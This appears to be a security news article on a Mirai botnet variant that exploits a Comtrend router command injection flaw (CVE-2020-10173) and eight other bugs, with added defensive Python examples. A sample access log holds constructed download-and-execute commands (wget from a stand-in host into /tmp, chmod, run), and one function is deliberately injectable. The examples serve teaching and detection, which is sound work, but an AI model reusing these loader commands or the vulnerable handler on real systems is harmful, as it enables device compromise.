A newly identified variant of the Mirai Internet of Things (IoT) botnet includes an exploit for a vulnerability affecting Comtrend routers.
Initially discovered in 2016, with its source code released online in October of the same year, Mirai has served as the base for numerous distributed denial of service (DDoS) botnets, several of which emerged in recent months alone, including SORA, UNSTABLE, and Mukashi, among others.
In terms of targeted devices or intrusion techniques, each of the Mirai variants has brought something new to the table, and the latest detected iteration is no different.
This is the first botnet variant observed exploiting CVE-2020-10173, a flaw in Comtrend VR-3033 routers, according to security researchers at Trend Micro.
The issue, an authenticated command injection vulnerability, could be exploited by remote attackers to “compromise the router-run network,” Trend Micro explains. The authentication requirement is a weak barrier on consumer routers, where default or reused credentials are common.
Proof-of-concept (PoC) code for the vulnerability has been publicly released, but this Mirai variant is the first malware observed attempting to exploit it in the wild.
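To make the bug class concrete, here is an added illustration (not Trend Micro's analysis and not the Comtrend code, whose internals this page does not describe) of a hypothetical router diagnostics handler with a command injection flaw, beside two hardened variants. The handler, the parameter name and the allow-list rule are assumptions; `echo` stands in for the diagnostic binary so the example runs offline.

```python
import re
import subprocess

# Hypothetical router "diagnostics" endpoint parameter handling. The real
# CVE-2020-10173 details are not on this page; this is the generic bug class.
# `echo` substitutes for the real diagnostic tool (e.g. ping) so it runs offline.

# Allow-list for a hostname or IPv4 literal (RFC 1123 labels). Assumption for
# the example; a real device would pick rules matching its feature.
HOST_RE = re.compile(
    r"^(?:[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?\.)*"
    r"[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?$"
)


def diag_vulnerable(host: str) -> str:
    """Classic injection: the request parameter is interpolated into a shell
    command string and handed to /bin/sh, which interprets ';', '|', '$(...)'."""
    cmd = f"echo diag target={host}"
    return subprocess.run(cmd, shell=True, capture_output=True, text=True).stdout


def diag_argv_only(host: str) -> str:
    """No shell involved: the parameter travels as one argv element, so shell
    metacharacters are passed to the program literally and never executed."""
    return subprocess.run(
        ["echo", "diag", f"target={host}"], capture_output=True, text=True
    ).stdout


def diag_hardened(host: str) -> str:
    """Defence in depth: strict allow-list validation first, then argv (no shell)."""
    if len(host) > 253 or not HOST_RE.fullmatch(host):
        raise ValueError("rejected diagnostic target")
    return diag_argv_only(host)


def hardened_rejects(host: str) -> bool:
    """Helper so callers can check the allow-list decision without exceptions."""
    try:
        diag_hardened(host)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    payload = "x; echo INJECTED"
    print("vulnerable :", repr(diag_vulnerable(payload)))   # second command runs
    print("argv-only  :", repr(diag_argv_only(payload)))    # payload echoed literally
    print("hardened   :", "rejected" if hardened_rejects(payload) else "accepted")
```

Passing the parameter as an argv element is the fix that removes the bug class; the allow-list is the extra layer that also stops the parameter being abused as an argument to the diagnostic tool itself.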
However, CVE-2020-10173 is only one of the vulnerabilities targeted by this variant. In total, it carries exploits for nine vulnerabilities, including a fairly recent flaw in GPON routers from Netlink.
That security flaw, a remote code execution vulnerability, was discovered earlier this year and has already been added to the Hoaxcalls botnet arsenal.
In addition to these two weaknesses, the latest Mirai variant targets a number of older security issues that have been exploited in the past by numerous other botnets, including bugs affecting LG SuperSign EZ CMS, AVTECH devices, D-Link devices, MVPower DVR, Symantec Web Gateway 5.0.2.8 and ThinkPHP.
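Because every exploit in this list is delivered over HTTP to a web management interface or CGI endpoint, the most practical defensive view is the device's or reverse proxy's access log. The following detection sketch is an added example, not part of Trend Micro's report: it parses Common Log Format lines, URL-decodes the request target and flags requests that carry shell metacharacters or a download-and-execute sequence of the kind IoT loaders use. The endpoint paths, the log lines and the loader heuristic are constructed for the example.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample access log (Common Log Format). Endpoints, addresses and
# payloads are invented for the example and do not reproduce any real exploit.
SAMPLE_LOG = """\
203.0.113.5 - - [12/Jul/2020:10:01:02 +0000] "POST /cgi-bin/diag.cgi HTTP/1.1" 200 512 "-" "Hello, world"
203.0.113.5 - - [12/Jul/2020:10:01:03 +0000] "POST /cgi-bin/diag.cgi?target=%3Bwget+http%3A%2F%2F198.51.100.7%2Fbins%2Farm7+-O+%2Ftmp%2Fa%3Bchmod+777+%2Ftmp%2Fa%3B%2Ftmp%2Fa HTTP/1.1" 200 512 "-" "Hello, world"
198.51.100.20 - - [12/Jul/2020:10:02:10 +0000] "GET /index.php?s=ping&cmd=wget+http%3A%2F%2F198.51.100.7%2Fx86+-O+%2Ftmp%2Fx%3Bsh+%2Ftmp%2Fx HTTP/1.1" 404 221 "-" "Mozilla/5.0"
192.0.2.9 - - [12/Jul/2020:10:03:00 +0000] "GET /cgi-bin/diag.cgi?target=example.com&count=3 HTTP/1.1" 200 640 "-" "Mozilla/5.0"
"""

CLF_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
# Shell separators that have no business in a management request target.
# A single '&' is excluded because it is the normal query-string separator.
SHELL_META_RE = re.compile(r"[;|`]|\$\(|&&")
# Heuristic for "fetch a binary, make it executable / run it from /tmp".
LOADER_RE = re.compile(
    r"\b(?:wget|curl|tftp)\b.{0,200}?(?:\bchmod\s+[0-7]{3,4}\b|\bbusybox\b|/tmp/)",
    re.IGNORECASE | re.DOTALL,
)


def parse_clf(line: str):
    """Return the CLF fields as a dict, or None for lines that do not parse."""
    m = CLF_RE.match(line)
    return m.groupdict() if m else None


def decode_target(target: str) -> str:
    """Decode twice: double-encoding is a common way to slip past naive filters."""
    return unquote_plus(unquote_plus(target))


def classify(line: str):
    """Return a hit record for a suspicious request, or None."""
    rec = parse_clf(line)
    if rec is None:
        return None
    decoded = decode_target(rec["target"])
    reasons = []
    if SHELL_META_RE.search(decoded):
        reasons.append("shell metacharacter in request target")
    if LOADER_RE.search(decoded):
        reasons.append("download-and-execute sequence")
    if not reasons:
        return None
    return {"ip": rec["ip"], "path": decoded.split("?", 1)[0], "reasons": reasons}


def scan(log_text: str):
    """Run classify() over every line and keep the hits, in log order."""
    return [hit for hit in (classify(l) for l in log_text.splitlines()) if hit]


if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(f'{hit["ip"]} {hit["path"]}: {"; ".join(hit["reasons"])}')
```

The decode step matters: a filter that inspects the raw request line sees `%3B` rather than `;`. The two checks are deliberately independent so that a loader staged without metacharacters (for example in a POST body that a full inspection would also have to cover) still trips the second rule.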
“The use of CVE-2020-10173 in the code of this version demonstrates how botnet developers continue to broaden their arsenal to manipulate as many targets as possible and leverage the opening that unpatched devices offer. In particular, newly discovered vulnerabilities offer better opportunities for cyber-criminals. Users, unaware that there is even a vulnerability, may not be able to patch the device before it’s too late,” Trend Micro concludes.
Since botnet operators appear to copy techniques from one another, the vulnerability affecting Comtrend routers will likely be picked up by other DDoS botnets as well, the researchers note.